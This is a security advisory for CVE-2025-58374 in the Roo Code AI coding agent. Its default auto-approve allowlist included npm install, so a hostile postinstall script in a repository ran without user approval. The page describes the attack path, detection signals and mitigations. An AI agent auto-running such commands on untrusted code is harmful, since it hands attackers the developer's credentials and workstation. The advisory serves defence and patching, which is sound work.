CVE-2025-58374 Overview
Roo Code is an AI-powered autonomous coding agent that integrates into developer editors. Versions 3.25.23 and below ship with a default allowlist of commands that bypass manual approval when the auto-approve feature is enabled. The allowlist includes npm install, which triggers npm lifecycle scripts during execution. An attacker who controls a repository's package.json can place a malicious postinstall script that executes automatically when a user opens the repository in Roo Code. This results in arbitrary local code execution under the developer's account. The issue is fixed in version 3.26.0 and is tracked as [CWE-78].
Critical Impact
Opening a malicious repository in Roo Code with auto-approve enabled runs attacker-controlled code on the developer's workstation without user interaction beyond opening the project.
Affected Products
- Roo Code versions 3.25.23 and earlier
- Roo Code VS Code extension (autonomous coding agent)
- Fixed in Roo Code version 3.26.0
Discovery Timeline
- 2025-09-06 - CVE-2025-58374 published to NVD
- 2025-09-15 - Last updated in NVD database
Technical Details for CVE-2025-58374
Vulnerability Analysis
The vulnerability stems from an insecure default configuration in Roo Code's auto-approve command allowlist. When auto-approve is enabled, commands matching the default allowlist execute without prompting the user. The allowlist includes npm install, a command that performs more than dependency resolution. The npm package manager runs lifecycle hooks such as preinstall, install, and postinstall defined in the project's package.json. These hooks execute arbitrary shell commands declared by the package author. An attacker who publishes a repository containing a hostile postinstall script can therefore achieve code execution the moment Roo Code auto-runs npm install on the project. The attacker payload runs with the privileges of the editor process, giving access to source code, credentials, SSH keys, and cloud tokens stored on the workstation.
Root Cause
The root cause is an OS command injection class issue [CWE-78] arising from treating npm install as a safe, read-only operation. Lifecycle scripts in package.json transform npm install into a generic code execution primitive controlled by repository contents.
Attack Vector
Exploitation requires user interaction in the form of opening a repository, but no further approval. An attacker hosts a repository containing a package.json with a malicious postinstall entry, then convinces a target to clone or open it in an editor running Roo Code with auto-approve enabled. The agent invokes npm install, npm executes the lifecycle hook, and the attacker payload runs locally. No verified public proof-of-concept code is published; see the GitHub Security Advisory GHSA-c292-qxq4-4p2v and the GitHub Pull Request Files for fix details.
Detection Methods for CVE-2025-58374
Indicators of Compromise
- Unexpected child processes spawned by node, npm, or the editor process shortly after a repository is opened
- New or modified files in user home directories, shell profiles (.bashrc, .zshrc), or SSH directories following npm install execution
- Outbound network connections from node processes to unfamiliar domains during dependency installation
- Presence of preinstall, install, or postinstall scripts in package.json files within untrusted repositories
Detection Strategies
- Monitor process trees where editor or Roo Code agent processes spawn npm followed by shell interpreters such as bash, sh, cmd.exe, or powershell.exe
- Alert on Roo Code extension versions at or below 3.25.23 reported in software inventory feeds
- Inspect repositories cloned by developers for lifecycle scripts that invoke network utilities, base64 decoding, or credential paths
Monitoring Recommendations
- Collect endpoint process telemetry covering parent-child relationships for node and npm executions on developer workstations
- Forward editor extension version inventories to centralized logging for version-based detection
- Track outbound DNS and HTTP traffic from developer machines during initial repository setup events
How to Mitigate CVE-2025-58374
Immediate Actions Required
- Upgrade Roo Code to version 3.26.0 or later on all developer workstations
- Disable the auto-approve commands feature until the upgrade is confirmed across the environment
- Audit existing repositories opened with auto-approve enabled for suspicious lifecycle scripts and signs of post-exploitation activity
- Rotate credentials, tokens, and SSH keys accessible from any workstation that opened untrusted repositories with vulnerable Roo Code versions
Patch Information
The fix is available in Roo Code release v3.26.0. The maintainers removed npm install from the default auto-approve allowlist as documented in the GitHub Pull Request Files and the GitHub Security Advisory GHSA-c292-qxq4-4p2v.
Workarounds
- Disable auto-approve entirely in Roo Code settings and require manual confirmation for every command
- Remove npm install and similar package manager commands from any custom auto-approve allowlist
- Run editors and Roo Code inside isolated development containers or virtual machines with no access to production credentials
- Configure npm to skip lifecycle scripts using npm config set ignore-scripts true on workstations that handle untrusted code
# Configuration example
npm config set ignore-scripts true
npm install --ignore-scripts
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
